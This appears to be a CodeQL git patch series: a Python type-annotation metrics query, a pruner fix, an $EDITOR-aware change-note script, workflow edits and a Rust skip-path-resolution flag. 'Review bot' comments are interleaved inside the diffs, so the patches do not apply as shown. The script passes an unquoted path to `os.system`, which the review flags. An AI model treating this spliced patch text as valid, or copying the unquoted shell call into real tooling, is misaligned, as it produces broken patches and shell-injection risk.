From 4141b4fb8a245ffac7323036fb16ec6c9e9e315e Mon Sep 17 00:00:00 2001
From: Taus
Date: Wed, 8 Jan 2025 15:41:31 +0000
Subject: [PATCH 001/892] Python: Add metrics query for type annotations

Adds a query that counts the number of type annotations of various kinds. Intended to be used with something like MRVA to inform our modelling decisions. Currently the query counts the following "interesting" types in addition to the total number of types:
- Built-in types (which are less likely to be interesting from a modelling perspective)
- Forward declarations (i.e. annotations inside strings) which will require a fair bit of QL machinery to interpret.
- Simple types (stuff like `foo` or `foo.bar.baz`)
- Optional types (stuff like `Optional[foo]` which from a modelling perspective should likely be treated the same as `foo`)
- Complex types (anything that contains more complex type constructions such as instantiations of generic types)
---
.../src/Metrics/Internal/TypeAnnotations.ql | 108 ++++++++++++++++++
1 file changed, 108 insertions(+)
create mode 100644 python/ql/src/Metrics/Internal/TypeAnnotations.ql
diff --git a/python/ql/src/Metrics/Internal/TypeAnnotations.ql b/python/ql/src/Metrics/Internal/TypeAnnotations.ql
new file mode 100644
index 000000000000..891e85084590
--- /dev/null
+++ b/python/ql/src/Metrics/Internal/TypeAnnotations.ql
@@ -0,0 +1,108 @@
+/**
+ * @name Type metrics
+ * @description Counts of various kinds of type annotations in Python code.
+ * @kind table
+ * @id py/type-metrics
+ */
+
+import python
+
+class BuiltinType extends Name {
+ BuiltinType() { this.getId() in ["int", "float", "str", "bool", "bytes", "None"] }
+}
+
+newtype TAnnotatable =
+ TAnnotatedFunction(FunctionExpr f) { exists(f.getReturns()) } or
+ TAnnotatedParameter(Parameter p) { exists(p.getAnnotation()) } or
+ TAnnotatedAssignment(AnnAssign a) { exists(a.getAnnotation()) }
+
+abstract class Annotatable extends TAnnotatable {
+ string toString() { result = "Annotatable" }
+
+ abstract Expr getAnnotation();
+}
+
+class AnnotatedFunction extends TAnnotatedFunction, Annotatable {
+ FunctionExpr function;
+
+ AnnotatedFunction() { this = TAnnotatedFunction(function) }
+
+ override Expr getAnnotation() { result = function.getReturns() }
+}
+
+class AnnotatedParameter extends TAnnotatedParameter, Annotatable {
+ Parameter parameter;
+
+ AnnotatedParameter() { this = TAnnotatedParameter(parameter) }
+
+ override Expr getAnnotation() { result = parameter.getAnnotation() }
+}
+
+class AnnotatedAssignment extends TAnnotatedAssignment, Annotatable {
+ AnnAssign assignment;
+
+ AnnotatedAssignment() { this = TAnnotatedAssignment(assignment) }
+
+ override Expr getAnnotation() { result = assignment.getAnnotation() }
+}
+
+/** Holds if `e` is a forward declaration of a type. */
+predicate is_forward_declaration(Expr e) { e instanceof StringLiteral }
+
+/** Holds if `e` is a type that may be difficult to analyze. */
+predicate is_complex_type(Expr e) {
+ e instanceof Subscript and not is_optional_type(e)
+ or
+ e instanceof Tuple
+ or
+ e instanceof List
+}
+
+/** Holds if `e` is a type of the form `Optional[...]`. */
+predicate is_optional_type(Subscript e) { e.getObject().(Name).getId() = "Optional" }
+
+/** Holds if `e` is a simple type, that is either an identifier (excluding built-in types) or an attribute of a simple type. */
+predicate is_simple_type(Expr e) {
+ e instanceof Name and not e instanceof BuiltinType
+ or
+ is_simple_type(e.(Attribute).getObject())
+}
+
+/** Holds if `e` is a built-in type. */
+predicate is_builtin_type(Expr e) { e instanceof BuiltinType }
+
+predicate type_count(
+ string kind, int total, int built_in_count, int forward_declaration_count, int simple_type_count,
+ int complex_type_count, int optional_type_count
+) {
+ kind = "Parameter annotation" and
+ total = count(AnnotatedParameter p) and
+ built_in_count = count(AnnotatedParameter p | is_builtin_type(p.getAnnotation())) and
+ forward_declaration_count =
+ count(AnnotatedParameter p | is_forward_declaration(p.getAnnotation())) and
+ simple_type_count = count(AnnotatedParameter p | is_simple_type(p.getAnnotation())) and
+ complex_type_count = count(AnnotatedParameter p | is_complex_type(p.getAnnotation())) and
+ optional_type_count = count(AnnotatedParameter p | is_optional_type(p.getAnnotation()))
+ or
+ kind = "Return type annotation" and
+ total = count(AnnotatedFunction f) and
+ built_in_count = count(AnnotatedFunction f | is_builtin_type(f.getAnnotation())) and
+ forward_declaration_count = count(AnnotatedFunction f | is_forward_declaration(f.getAnnotation())) and
+ simple_type_count = count(AnnotatedFunction f | is_simple_type(f.getAnnotation())) and
+ complex_type_count = count(AnnotatedFunction f | is_complex_type(f.getAnnotation())) and
+ optional_type_count = count(AnnotatedFunction f | is_optional_type(f.getAnnotation()))
+ or
+ kind = "Annotated assignment" and
+ total = count(AnnotatedAssignment a) and
+ built_in_count = count(AnnotatedAssignment a | is_builtin_type(a.getAnnotation())) and
+ forward_declaration_count =
+ count(AnnotatedAssignment a |
is_forward_declaration(a.getAnnotation())) and + simple_type_count = count(AnnotatedAssignment a | is_simple_type(a.getAnnotation())) and + complex_type_count = count(AnnotatedAssignment a | is_complex_type(a.getAnnotation())) and + optional_type_count = count(AnnotatedAssignment a | is_optional_type(a.getAnnotation())) +} + +from + string message, int total, int built_in, int forward_decl, int simple, int complex, int optional +where type_count(message, total, built_in, forward_decl, simple, complex, optional) +select message, total, built_in, forward_decl, simple, complex, optional From 918c05c538bb139f22e6a3f1f89aaef5bd314d0f Mon Sep 17 00:00:00 2001 From: Taus Date: Tue, 11 Feb 2025 12:58:52 +0000 Subject: [PATCH 002/892] Python: Don't prune any `MatchLiteralPattern`s Extends the mechanism introduced in https://github.com/github/codeql/pull/18030 to behave the same for _all_ `MatchLiteralPattern`s, not just the ones that happen to be the constant `True` or `False`. Co-authored-by: yoff --- python/extractor/semmle/python/passes/pruner.py | 6 +++--- .../Statements/unreachable/UnreachableCode.expected | 3 --- 2 files changed, 3 insertions(+), 6 deletions(-) diff --git a/python/extractor/semmle/python/passes/pruner.py b/python/extractor/semmle/python/passes/pruner.py index fe3b03d453cd..5b69ec25bf3d 100644 --- a/python/extractor/semmle/python/passes/pruner.py +++ b/python/extractor/semmle/python/passes/pruner.py @@ -203,7 +203,8 @@ def __init__(self): self.nodes = set() def visit_MatchLiteralPattern(self, node): - # MatchLiteralPatterns _look_ like boolean tests, but are not. + # MatchLiteralPatterns _look_ like boolean tests in that they have both a true ("matched") + # and false ("didn't match") successor, but are not. # Thus, without this check, we would interpret # # match x: 
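Review bot: `is_optional_type` only matches a subscript whose object is the bare name `Optional`, so `typing.Optional[foo]` (whose object is an `Attribute`) is counted by `is_complex_type` through its `Subscript and not is_optional_type(e)` branch, and a PEP 604 union such as `foo | None` lands in none of the categories. The commit message says optional types should be treated like the underlying type for modelling, so this skews the complex/optional split the metrics are meant to inform. Consider accepting the qualified form as well, for example adding `or e.getObject().(Attribute).getName() = "Optional"` to the predicate body, and stating in its QLDoc that `X | None` is not covered. `BuiltinType` also has no QLDoc; a one-line `/** A name that refers to one of a fixed list of built-in types. */` would match the documented predicates.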
@@ -212,8 +213,7 @@ def visit_MatchLiteralPattern(self, node): # # (and similarly for True) as if it was a boolean test. This would cause the true edge # (leading to pass) to be pruned later on. - if isinstance(node.literal, ast.Name) and node.literal.id in ('True', 'False'): - self.nodes.add(node.literal) + self.nodes.add(node.literal) class NonlocalVisitor(ASTVisitor): def __init__(self): diff --git a/python/ql/test/query-tests/Statements/unreachable/UnreachableCode.expected b/python/ql/test/query-tests/Statements/unreachable/UnreachableCode.expected index f5e74fab8d49..2417041f472d 100644 --- a/python/ql/test/query-tests/Statements/unreachable/UnreachableCode.expected +++ b/python/ql/test/query-tests/Statements/unreachable/UnreachableCode.expected @@ -4,6 +4,3 @@ | test.py:21:5:21:38 | For | This statement is unreachable. | | test.py:28:9:28:21 | ExprStmt | This statement is unreachable. | | test.py:84:5:84:21 | ExceptStmt | This statement is unreachable. | -| test.py:158:9:159:16 | Case | This statement is unreachable. | -| test.py:162:13:162:16 | Pass | This statement is unreachable. | -| test.py:167:13:167:16 | Pass | This statement is unreachable. | From a69e3f523666f4dffa06f6c845ca68364f320e76 Mon Sep 17 00:00:00 2001 From: Taus Date: Tue, 11 Feb 2025 13:02:09 +0000 Subject: [PATCH 003/892] Python: Add change note Co-authored-by: yoff --- .../lib/change-notes/2025-02-11-fix-match-literal-pruning.md | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 python/ql/lib/change-notes/2025-02-11-fix-match-literal-pruning.md diff --git a/python/ql/lib/change-notes/2025-02-11-fix-match-literal-pruning.md b/python/ql/lib/change-notes/2025-02-11-fix-match-literal-pruning.md new file mode 100644 index 000000000000..79b2d4b11fec --- /dev/null +++ b/python/ql/lib/change-notes/2025-02-11-fix-match-literal-pruning.md 
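Review bot: The comment kept as context above the new unconditional `self.nodes.add(node.literal)` still explains the guard only in terms of the constants (`(and similarly for True) as if it was a boolean test`), while the code now protects every literal pattern. A reader comparing the comment with the code would assume the True/False restriction is still in force. Suggest appending a line such as `# This applies to every literal pattern, not only True/False: none of them is a boolean test.` before the `add` call. The method starts in the previous hunk, so the full comment is not visible here.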
@@ -0,0 +1,5 @@ +--- +category: fix +--- + +- `MatchLiteralPattern`s are now never pruned, as this could lead to code being wrongly identified as unreachable. From 4c3a2cd1112f958a00c402cb9cb8024044d29c68 Mon Sep 17 00:00:00 2001 From: Simon Friis Vindum Date: Tue, 11 Feb 2025 14:04:46 +0100 Subject: [PATCH 004/892] Change note creation script uses EDITOR environment variable Changes the script for creating change notes to read the EDITOR environment variable, and use the editor specified therein. This makes the script more convenient when used from a terminal. The VSCode task is updated to the set EDITOR to `code -r` which preserves the current behavior. --- .vscode/tasks.json | 10 ++++++++++ misc/scripts/create-change-note.py | 8 +++++--- 2 files changed, 15 insertions(+), 3 deletions(-) diff --git a/.vscode/tasks.json b/.vscode/tasks.json index 5e4b9397d26d..5786439f38fb 100644 --- a/.vscode/tasks.json +++ b/.vscode/tasks.json @@ -50,6 +50,11 @@ "${input:name}", "${input:categoryQuery}" ], + "options": { + "env": { + "EDITOR": "code -r", + } + }, "presentation": { "reveal": "never", "close": true @@ -67,6 +72,11 @@ "${input:name}", "${input:categoryLibrary}" ], + "options": { + "env": { + "EDITOR": "code -r" + } + }, "presentation": { "reveal": "never", "close": true diff --git a/misc/scripts/create-change-note.py b/misc/scripts/create-change-note.py index 548fa4e87fb0..eb7eb95e7b87 100755 --- a/misc/scripts/create-change-note.py +++ b/misc/scripts/create-change-note.py @@ -1,6 +1,7 @@ #!/usr/bin/env python3 -# Creates a change note and opens it in VSCode for editing. +# Creates a change note and opens it in $EDITOR (or VSCode if the environment +# variable is not set) for editing. # Expects to receive the following arguments: # - What language the change note is for 
@@ -51,5 +52,6 @@ with open(change_note_file, "w") as f: f.write(change_note) -# Open the change note file in VSCode, reusing the existing window if possible -os.system(f"code -r {change_note_file}") +editor = os.environ.get('EDITOR', 'code') + +os.system(f"{editor} {change_note_file}") From 9bd116fcf81e7d3655106327d600e6411edf136f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=93scar=20San=20Jos=C3=A9?= Date: Tue, 11 Feb 2025 16:02:40 +0100 Subject: [PATCH 005/892] Add actions to codeql analysis workflow --- .github/workflows/codeql-analysis.yml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/.github/workflows/codeql-analysis.yml b/.github/workflows/codeql-analysis.yml index d571d961e677..f6226f2182dd 100644 --- a/.github/workflows/codeql-analysis.yml +++ b/.github/workflows/codeql-analysis.yml @@ -18,6 +18,10 @@ on: jobs: CodeQL-Build: + strategy: + fail-fast: false + matrix: + language: ['actions', 'csharp'] runs-on: ubuntu-latest @@ -38,9 +42,7 @@ jobs: # Initializes the CodeQL tools for scanning. - name: Initialize CodeQL uses: github/codeql-action/init@main - # Override language selection by uncommenting this and choosing your languages with: - languages: csharp config-file: ./.github/codeql/codeql-config.yml # Autobuild attempts to build any compiled languages (C/C++, C#, or Java). From 3611673eec702a80e60581ba35824e7255664125 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=93scar=20San=20Jos=C3=A9?= Date: Wed, 12 Feb 2025 12:34:02 +0100 Subject: [PATCH 006/892] Fix param name in CodeQL workflow configuration --- .github/workflows/codeql-analysis.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/codeql-analysis.yml b/.github/workflows/codeql-analysis.yml index f6226f2182dd..8c4a7b83a73b 100644 --- a/.github/workflows/codeql-analysis.yml +++ b/.github/workflows/codeql-analysis.yml 
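Review bot: `os.system(f"{editor} {change_note_file}")` hands the note path to a shell unquoted, so a path containing spaces or shell metacharacters is split or interpreted by the shell; the path appears to be built from the script's arguments, which are outside this hunk. Splitting only the editor string and passing the path as its own argument avoids that and still supports values like `code -r`: `subprocess.run(shlex.split(editor) + [change_note_file])`. Separately, the fallback `'code'` drops the `-r` that the removed line used, so running the script without `EDITOR` no longer reuses the existing window; `os.environ.get('EDITOR', 'code -r')` keeps the old behaviour. The change needs `shlex` and `subprocess` imported at the top of the file, which is not visible in this hunk.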
@@ -21,7 +21,7 @@ jobs: strategy: fail-fast: false matrix: - language: ['actions', 'csharp'] + languages: ['actions', 'csharp'] runs-on: ubuntu-latest From efd9523079562e325366de6e237359fd2f2390fc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=93scar=20San=20Jos=C3=A9?= Date: Wed, 12 Feb 2025 12:59:48 +0100 Subject: [PATCH 007/892] Fix typo in CodeQL workflow configuration --- .github/workflows/codeql-analysis.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/.github/workflows/codeql-analysis.yml b/.github/workflows/codeql-analysis.yml index 8c4a7b83a73b..ba384245e0eb 100644 --- a/.github/workflows/codeql-analysis.yml +++ b/.github/workflows/codeql-analysis.yml @@ -21,7 +21,7 @@ jobs: strategy: fail-fast: false matrix: - languages: ['actions', 'csharp'] + language: ['actions', 'csharp'] runs-on: ubuntu-latest @@ -43,6 +43,7 @@ jobs: - name: Initialize CodeQL uses: github/codeql-action/init@main with: + languages: ${{ matrix.language }} config-file: ./.github/codeql/codeql-config.yml # Autobuild attempts to build any compiled languages (C/C++, C#, or Java). From 98ff40646210e1ec67dbe5ba2c4e7f69090aa4e3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=93scar=20San=20Jos=C3=A9?= Date: Wed, 12 Feb 2025 16:42:08 +0100 Subject: [PATCH 008/892] Add codeql exception to integration-tests folder --- .github/codeql/codeql-config.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/codeql/codeql-config.yml b/.github/codeql/codeql-config.yml index 9740cf65147e..3548a42cbdec 100644 --- a/.github/codeql/codeql-config.yml +++ b/.github/codeql/codeql-config.yml @@ -8,5 +8,6 @@ paths-ignore: - '/java/' - '/python/' - '/javascript/ql/test' + - '/javascript/ql/integration-tests' - '/javascript/extractor/tests' - '/rust/ql' From c1df8d0e1382076b67a74ebc900c276a19b86caa Mon Sep 17 00:00:00 2001 
From: Paolo Tranquilli Date: Wed, 19 Feb 2025 09:44:09 +0100 Subject: [PATCH 009/892] Rust: add flag to turn off extractor path resolution --- rust/codeql-extractor.yml | 4 ++ rust/extractor/src/config.rs | 1 + rust/extractor/src/main.rs | 22 +++++-- rust/extractor/src/translate.rs | 2 +- rust/extractor/src/translate/base.rs | 21 ++++++ .../canonical_path/disabled/anonymous.rs | 39 +++++++++++ .../disabled/canonical_paths.expected | 66 +++++++++++++++++++ .../disabled/canonical_paths.qlref | 1 + .../canonical_path/disabled/options.yml | 1 + .../canonical_path/disabled/regular.rs | 66 +++++++++++++++++++ 10 files changed, 218 insertions(+), 5 deletions(-) create mode 100644 rust/ql/test/extractor-tests/canonical_path/disabled/anonymous.rs create mode 100644 rust/ql/test/extractor-tests/canonical_path/disabled/canonical_paths.expected create mode 100644 rust/ql/test/extractor-tests/canonical_path/disabled/canonical_paths.qlref create mode 100644 rust/ql/test/extractor-tests/canonical_path/disabled/options.yml create mode 100644 rust/ql/test/extractor-tests/canonical_path/disabled/regular.rs diff --git a/rust/codeql-extractor.yml b/rust/codeql-extractor.yml index 27f423134a67..1c73a070e587 100644 --- a/rust/codeql-extractor.yml +++ b/rust/codeql-extractor.yml @@ -78,3 +78,7 @@ options: Collect flame graph data using the `tracing-flame` crate. To render a flame graph or chart, run the `inferno-flamegraph` command. See also: https://crates.io/crates/tracing-flame type: string + skip_path_resolution: + title: Skip path resolution + description: > + Skip path resolution. This is experimental, while we move path resolution from the extractor to the QL library. diff --git a/rust/extractor/src/config.rs b/rust/extractor/src/config.rs index 82568b64553f..aec443f6d871 100644 --- a/rust/extractor/src/config.rs +++ b/rust/extractor/src/config.rs 
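Review bot: The added `skip_path_resolution` option declares only `title` and `description`, while the option just above it in this hunk's context ends with `type: string`. `config.rs` reads the value into a `bool` field, so an unconstrained option value could fail to parse or be silently misread, depending on how the option schema treats a missing type (not visible here). Consider adding `type: string` and, if the schema supports it, a `pattern: "^(false|true)$"` line so invalid values are rejected when the option is set rather than inside the extractor.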
@@ -57,6 +57,7 @@ pub struct Config { pub qltest: bool, pub qltest_cargo_check: bool, pub qltest_dependencies: Vec, + pub skip_path_resolution: bool, } impl Config { diff --git a/rust/extractor/src/main.rs b/rust/extractor/src/main.rs index 04aaf23c652e..9d70956ab189 100644 --- a/rust/extractor/src/main.rs +++ b/rust/extractor/src/main.rs @@ -1,5 +1,6 @@ use crate::diagnostics::{emit_extraction_diagnostics, ExtractionStep}; use crate::rust_analyzer::path_to_file_id; +use crate::translate::ResolvePaths; use crate::trap::TrapId; use anyhow::Context; use archive::Archiver; @@ -43,7 +44,7 @@ impl<'a> Extractor<'a> { } } - fn extract(&mut self, rust_analyzer: &rust_analyzer::RustAnalyzer, file: &std::path::Path) { + fn extract(&mut self, rust_analyzer: &RustAnalyzer, file: &Path, resolve_paths: ResolvePaths) { self.archiver.archive(file); let before_parse = Instant::now(); @@ -66,6 +67,7 @@ impl<'a> Extractor<'a> { label, line_index, semantics_info.as_ref().ok(), + resolve_paths, ); for err in errors { @@ -102,12 +104,17 @@ impl<'a> Extractor<'a> { file: &Path, semantics: &Semantics<'_, RootDatabase>, vfs: &Vfs, + resolve_paths: ResolvePaths, ) { - self.extract(&RustAnalyzer::new(vfs, semantics), file); + self.extract(&RustAnalyzer::new(vfs, semantics), file, resolve_paths); } pub fn extract_without_semantics(&mut self, file: &Path, reason: &str) { - self.extract(&RustAnalyzer::WithoutSemantics { reason }, file); + self.extract( + &RustAnalyzer::WithoutSemantics { reason }, + file, + ResolvePaths::No, + ); } pub fn load_manifest( 
@@ -236,12 +243,19 @@ fn main() -> anyhow::Result<()> { extractor.extract_without_semantics(file, "no manifest found"); } let cargo_config = cfg.to_cargo_config(&cwd()?); + let resolve_paths = if cfg.skip_path_resolution { + ResolvePaths::No + } else { + ResolvePaths::Yes + }; for (manifest, files) in map.values().filter(|(_, files)| !files.is_empty()) { if let Some((ref db, ref vfs)) = extractor.load_manifest(manifest, &cargo_config) { let semantics = Semantics::new(db); for file in files { match extractor.load_source(file, &semantics, vfs) { - Ok(()) => extractor.extract_with_semantics(file, &semantics, vfs), + Ok(()) => { + extractor.extract_with_semantics(file, &semantics, vfs, resolve_paths) + } Err(reason) => extractor.extract_without_semantics(file, &reason), }; } diff --git a/rust/extractor/src/translate.rs b/rust/extractor/src/translate.rs index 4e9cda3e2aa1..c74652628f8c 100644 --- a/rust/extractor/src/translate.rs +++ b/rust/extractor/src/translate.rs @@ -2,4 +2,4 @@ mod base; mod generated; mod mappings; -pub use base::Translator; +pub use base::{ResolvePaths, Translator}; diff --git a/rust/extractor/src/translate/base.rs b/rust/extractor/src/translate/base.rs index fe13de6498e2..19c86374a455 100644 --- a/rust/extractor/src/translate/base.rs +++ b/rust/extractor/src/translate/base.rs @@ -83,6 +83,12 @@ macro_rules! dispatch_to_tracing { }; } +#[derive(Copy, Clone, PartialEq, Eq)] +pub enum ResolvePaths { + Yes, + No, +} + pub struct Translator<'a> { pub trap: TrapFile, path: &'a str, @@ -90,6 +96,7 @@ pub struct Translator<'a> { line_index: LineIndex, file_id: Option, pub semantics: Option<&'a Semantics<'a, RootDatabase>>, + resolve_paths: ResolvePaths, } const UNKNOWN_LOCATION: (LineCol, LineCol) = @@ -102,6 +109,7 @@ impl<'a> Translator<'a> { label: Label, line_index: LineIndex, semantic_info: Option<&FileSemanticInformation<'a>>, + resolve_paths: ResolvePaths, ) -> Translator<'a> { Translator { trap, 
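Review bot: When `cfg.skip_path_resolution` is set, every file is extracted with `ResolvePaths::No` and nothing records that choice, so the resulting database is indistinguishable from one where resolution simply found nothing (the new `.expected` file in this patch shows `None` for every entry). Queries that rely on resolved or canonical paths would then return fewer results with no indication why, which matters when the database is used for security analysis. Consider logging once where `resolve_paths` is computed, for example `tracing::info!("path resolution disabled via skip_path_resolution");` if the extractor logs through `tracing`, as the flame-graph option suggests. `main` continues outside this hunk.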
@@ -110,6 +118,7 @@ impl<'a> Translator<'a> { line_index, file_id: semantic_info.map(|i| i.file_id), semantics: semantic_info.map(|i| i.semantics), + resolve_paths, } } fn location(&self, range: TextRange) -> Option<(LineCol, LineCol)> { @@ -497,6 +506,9 @@ impl<'a> Translator<'a> { item: &T, label: Label, ) { + if self.resolve_paths == ResolvePaths::No { + return; + } (|| { let sema = self.semantics.as_ref()?; let def = T::Hir::try_from_source(item, sema)?; @@ -517,6 +529,9 @@ impl<'a> Translator<'a> { item: &ast::Variant, label: Label, ) { + if self.resolve_paths == ResolvePaths::No { + return; + } (|| { let sema = self.semantics.as_ref()?; let def = sema.to_enum_variant_def(item)?; @@ -537,6 +552,9 @@ impl<'a> Translator<'a> { item: &impl PathAst, label: Label, ) { + if self.resolve_paths == ResolvePaths::No { + return; + } (|| { let path = item.path()?; let sema = self.semantics.as_ref()?; @@ -557,6 +575,9 @@ impl<'a> Translator<'a> { item: &ast::MethodCallExpr, label: Label, ) { + if self.resolve_paths == ResolvePaths::No { + return; + } (|| { let sema = self.semantics.as_ref()?; let resolved = sema.resolve_method_call_fallback(item)?; diff --git a/rust/ql/test/extractor-tests/canonical_path/disabled/anonymous.rs b/rust/ql/test/extractor-tests/canonical_path/disabled/anonymous.rs new file mode 100644 index 000000000000..d26ea6b992d7 --- /dev/null +++ b/rust/ql/test/extractor-tests/canonical_path/disabled/anonymous.rs 
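Review bot: The guard `if self.resolve_paths == ResolvePaths::No { return; }` is pasted at the top of four separate methods (the hunks at -497, -517, -537 and -557), so a resolution site added later can miss it and the flag would then apply only partially. A small private helper keeps the decision in one place, e.g. `fn should_resolve_paths(&self) -> bool { self.resolve_paths == ResolvePaths::Yes }`, with each method starting `if !self.should_resolve_paths() { return; }`. The `ResolvePaths` enum added earlier in this file also has no doc comment; `/// Whether the extractor emits resolved and canonical paths.` would do. The enclosing methods start and end outside these hunks.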
@@ -0,0 +1,39 @@
+// would prefer to write `include!("../anonymous.rs");`
+// but it seems `include!` does not work in rust-analyzer/our extractor
+
+use super::regular::Trait;
+
+fn canonicals() {
+ struct OtherStruct;
+
+ trait OtherTrait {
+ fn g(&self);
+ }
+
+ impl OtherTrait for OtherStruct {
+ fn g(&self) {}
+ }
+
+ impl OtherTrait for crate::regular::Struct {
+ fn g(&self) {}
+ }
+
+ impl crate::regular::Trait for OtherStruct {
+ fn f(&self) {}
+ }
+
+ fn nested() {
+ struct OtherStruct;
+ }
+
+ fn usage() {
+ let s = OtherStruct {};
+ s.f();
+ s.g();
+ nested();
+ }
+}
+
+fn other() {
+ struct OtherStruct;
+}
diff --git a/rust/ql/test/extractor-tests/canonical_path/disabled/canonical_paths.expected b/rust/ql/test/extractor-tests/canonical_path/disabled/canonical_paths.expected
new file mode 100644
index 000000000000..6a19610d76ff
--- /dev/null
+++ b/rust/ql/test/extractor-tests/canonical_path/disabled/canonical_paths.expected
@@ -0,0 +1,66 @@ +canonicalPaths +| anonymous.rs:4:1:4:26 | Use | None | None | +| anonymous.rs:6:1:35:1 | fn canonicals | None | None | +| anonymous.rs:7:5:7:23 | struct OtherStruct | None | None | +| anonymous.rs:9:5:11:5 | trait OtherTrait | None | None | +| anonymous.rs:10:9:10:20 | fn g | None | None | +| anonymous.rs:13:5:15:5 | impl OtherTrait for OtherStruct { ... } | None | None | +| anonymous.rs:14:9:14:22 | fn g | None | None | +| anonymous.rs:17:5:19:5 | impl OtherTrait for ...::Struct { ... } | None | None | +| anonymous.rs:18:9:18:22 | fn g | None | None | +| anonymous.rs:21:5:23:5 | impl ...::Trait for OtherStruct { ... } | None | None | +| anonymous.rs:22:9:22:22 | fn f | None | None | +| anonymous.rs:25:5:27:5 | fn nested | None | None | +| anonymous.rs:26:9:26:27 | struct OtherStruct | None | None | +| anonymous.rs:29:5:34:5 | fn usage | None | None | +| anonymous.rs:37:1:39:1 | fn other | None | None | +| anonymous.rs:38:5:38:23 | struct OtherStruct | None | None | +| lib.rs:1:1:1:14 | mod anonymous | None | None | +| lib.rs:2:1:2:12 | mod regular | None | None | +| regular.rs:4:1:5:18 | struct Struct | None | None | +| regular.rs:7:1:9:1 | trait Trait | None | None | +| regular.rs:8:5:8:16 | fn f | None | None | +| regular.rs:11:1:13:1 | impl Trait for Struct { ... } | None | None | +| regular.rs:12:5:12:18 | fn f | None | None | +| regular.rs:15:1:17:1 | impl Struct { ... } | None | None | +| regular.rs:16:5:16:18 | fn g | None | None | +| regular.rs:19:1:21:1 | trait TraitWithBlanketImpl | None | None | +| regular.rs:20:5:20:16 | fn h | None | None | +| regular.rs:23:1:25:1 | impl TraitWithBlanketImpl for T { ... 
} | None | None | +| regular.rs:24:5:24:18 | fn h | None | None | +| regular.rs:27:1:27:12 | fn free | None | None | +| regular.rs:29:1:35:1 | fn usage | None | None | +| regular.rs:37:1:41:1 | enum MyEnum | None | None | +| regular.rs:43:1:49:1 | fn enum_qualified_usage | None | None | +| regular.rs:51:1:58:1 | fn enum_unqualified_usage | None | None | +| regular.rs:54:5:54:18 | Use | None | None | +| regular.rs:60:1:66:1 | fn enum_match | None | None | +resolvedPaths +| anonymous.rs:30:17:30:30 | OtherStruct {...} | None | None | +| anonymous.rs:31:9:31:9 | s | None | None | +| anonymous.rs:31:9:31:13 | s.f(...) | None | None | +| anonymous.rs:32:9:32:9 | s | None | None | +| anonymous.rs:32:9:32:13 | s.g(...) | None | None | +| anonymous.rs:33:9:33:14 | nested | None | None | +| regular.rs:30:13:30:21 | Struct {...} | None | None | +| regular.rs:31:5:31:5 | s | None | None | +| regular.rs:31:5:31:9 | s.f(...) | None | None | +| regular.rs:32:5:32:5 | s | None | None | +| regular.rs:32:5:32:9 | s.g(...) | None | None | +| regular.rs:33:5:33:5 | s | None | None | +| regular.rs:33:5:33:9 | s.h(...) | None | None | +| regular.rs:34:5:34:8 | free | None | None | +| regular.rs:44:9:44:26 | ...::None::<...> | None | None | +| regular.rs:45:9:45:20 | ...::Some | None | None | +| regular.rs:46:9:46:24 | ...::Variant1 | None | None | +| regular.rs:47:9:47:24 | ...::Variant2 | None | None | +| regular.rs:48:9:48:33 | ...::Variant3 {...} | None | None | +| regular.rs:52:9:52:18 | None::<...> | None | None | +| regular.rs:53:9:53:12 | Some | None | None | +| regular.rs:55:9:55:16 | Variant1 | None | None | +| regular.rs:56:9:56:16 | Variant2 | None | None | +| regular.rs:57:9:57:25 | Variant3 {...} | None | None | +| regular.rs:61:11:61:11 | e | None | None | +| regular.rs:62:9:62:24 | ...::Variant1 | None | None | +| regular.rs:63:9:63:27 | ...::Variant2(...) | None | None | +| regular.rs:64:9:64:31 | ...::Variant3 {...} | None | None | 
diff --git a/rust/ql/test/extractor-tests/canonical_path/disabled/canonical_paths.qlref b/rust/ql/test/extractor-tests/canonical_path/disabled/canonical_paths.qlref
new file mode 100644
index 000000000000..f40a74f5aeda
--- /dev/null
+++ b/rust/ql/test/extractor-tests/canonical_path/disabled/canonical_paths.qlref
@@ -0,0 +1 @@
+extractor-tests/canonical_path/canonical_paths.ql
diff --git a/rust/ql/test/extractor-tests/canonical_path/disabled/options.yml b/rust/ql/test/extractor-tests/canonical_path/disabled/options.yml
new file mode 100644
index 000000000000..baee4ba5afe9
--- /dev/null
+++ b/rust/ql/test/extractor-tests/canonical_path/disabled/options.yml
@@ -0,0 +1 @@
+skip_path_resolution: true
diff --git a/rust/ql/test/extractor-tests/canonical_path/disabled/regular.rs b/rust/ql/test/extractor-tests/canonical_path/disabled/regular.rs
new file mode 100644
index 000000000000..44483645485a
--- /dev/null
+++ b/rust/ql/test/extractor-tests/canonical_path/disabled/regular.rs
@@ -0,0 +1,66 @@
+// would prefer to write `include!("../regular.rs");`
+// but it seems `include!` does not work in rust-analyzer/our extractor
+
+#[derive(Eq, PartialEq)]
+pub struct Struct;
+
+pub trait Trait {
+ fn f(&self);
+}
+
+impl Trait for Struct {
+ fn f(&self) {}
+}
+
+impl Struct {
+ fn g(&self) {}
+}
+
+trait TraitWithBlanketImpl {
+ fn h(&self);
+}
+
+impl TraitWithBlanketImpl for T {
+ fn h(&self) {}
+}
+
+fn free() {}
+
+fn usage() {
+ let s = Struct {};
+ s.f();
+ s.g();
+ s.h();
+ free();
+}
+
+enum MyEnum {
+ Variant1,
+ Variant2(usize),
+ Variant3 { x: usize },
+}
+
+fn enum_qualified_usage() {
+ _ = Option::None::<()>;
+ _ = Option::Some(0);
+ _ = MyEnum::Variant1;
+ _ = MyEnum::Variant2(0);
+ _ = MyEnum::Variant3 { x: 1 };
+}
+
+fn enum_unqualified_usage() {
+ _ = None::<()>;
+ _ = Some(0);
+ use MyEnum::*;
+ _ = Variant1;
+ _ = Variant2(0);
+ _ = Variant3 { x: 1 };
+}
+
+fn enum_match(e: MyEnum) {
+ match e {
+ MyEnum::Variant1 => {}
+ MyEnum::Variant2(_) => {}
+ MyEnum::Variant3 { .. } => {}
+ }
+}
From 9b6f0da1c19f84236acb72ebcc43d4f7bb3ff05c Mon Sep 17 00:00:00 2001
